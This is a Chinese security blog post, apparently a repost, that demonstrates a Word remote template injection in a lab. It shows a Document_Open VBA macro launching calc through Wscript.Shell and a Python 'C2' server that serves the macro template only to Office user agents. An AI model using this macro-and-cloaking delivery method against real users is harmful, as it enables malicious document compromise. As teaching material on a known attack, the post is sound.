攻防角度理解模板注入攻击
2023-12-6 07:19:13 Author: 安全狗的自我修养(查看原文) 阅读量:22 收藏

目录导航

本地ip劫持

添加VB宏代码

编写c2 python服务器代码

修改模板文档

如何分析模板注入样本

脚本提取与流量分析

相关视频教程

题或者了解更多视频教程

 

实验开始之前我们需要对本机host做劫持,修改hosts文件,让指定域名强制解析为我们机器的ip

将域名强制劫持成本地ip地址

接下来创建一个空白文档->选择开发者工具(非默认开启)->选择Visual Basi

可以双击左侧文档,为文档添加一VB宏代码

添加宏代码如下,加载com组件启动calc

Sub Document_Open()
Set objShell = CreateObject("Wscript.Shell")objShell.Run "calc"
End Sub

点击运行测试我们的脚本可以正常运行

将文档保存到文件服务器将要映射的文件路径下

 主图保存文档格式为启动宏的Word模板格式

  写一段python服务器代码

from http.server import HTTPServer, BaseHTTPRequestHandler
host = ('localhost', 80)FILE_TO_SERVE1 = r'C:\Simple\WWW\test.txt'FILE_TO_SERVE2 = r'C:\Simple\WWW\test2.txt'
class My_Server(BaseHTTPRequestHandler): def do_GET(self, *args, **kwargs): if "MSOffice" in self.headers['user-agent']: self.send_response(200) self.send_header("Content-type", "application/msword") self.end_headers() body = b'' with open(FILE_TO_SERVE1, "rb") as f: body = f.read() self.wfile.write(body) self.wfile.close() else: self.send_response(200) self.send_header("Content-type", "image/jpeg") self.end_headers() body = b'' with open(FILE_TO_SERVE2, "rb") as f: body = f.read() self.wfile.write(body) self.wfile.close()
def do_OPTIONS(self): self.send_response(200, "ok") self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') self.send_header("Access-Control-Allow-Headers", "X-Requested-With, Content-type")

if __name__ == '__main__': server = HTTPServer(host, My_Server) print("server启动@ : %s:%s" % host)
server.serve_forever()

文章来源: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247490398&idx=1&sn=5f28864033c43609f344bdc817550967&chksm=c13f2817f648a101938ec5b7a7dba9efa9a49b29ec213e9f3260f644f69b998ed94f699f979d&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh